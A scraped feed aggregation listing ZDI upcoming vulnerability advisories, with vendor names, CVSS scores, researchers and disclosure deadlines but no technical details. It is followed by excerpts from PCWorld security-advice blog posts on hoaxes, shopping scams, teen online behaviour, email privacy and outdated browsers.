http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1750: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1748: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1795: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1790: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Brett Gervasoni' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1787: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1784: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1768: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1767: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1766: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1765: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1761: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1760: Hewlett-Packard, Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1759: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1752: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1749: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1745: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1744: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1741: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1730: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1729: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1624: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1623: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1622: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1621: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1743: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1742: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1735: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1734: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1772: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1747: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1688: Avaya

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1478: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-11, 119 days ago. The vendor is given until 2013-08-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1746: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1718: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1717: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1713: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1565: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1684: Citrix

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-01-23, 138 days ago. The vendor is given until 2013-07-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1736: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1698: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'axtaxt' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1690: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1671: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1670: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1669: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1676: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'agix' was reported to the affected vendor on: 2013-01-08, 153 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1726: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1678: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1579: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 229 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 453 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 453 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you haven't already, don't bother. It's a hoax. It's not even a new hoax. It's a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly-traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy and paste of a disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: "In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention)."

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thing--the glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so it's primetime for cybercriminals. Be careful what apps you install and what you click on from your mobile device. Rising threat of mobile scams and malware Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping.

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfee--Exploring the Digital Divide--teens in the United States are even more likely to engage in shady online activities. The new report is a follow up to McAfee's The Digital Divide: How the Online Behavior of Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullying--only half a percentage point behind the Netherlands. Go USA?

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeus--a respected and highly-decorated Army general--abruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But, the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus' affection, and that woman--Jill Kelley--initiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I don't want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but let's take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online.

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kaspersky--a security software vendor--nearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sites--all through the browser. Attackers know this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends. * 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions. * When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade. Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what they're meant to do--keep your browser up to date without requiring you to manage the process 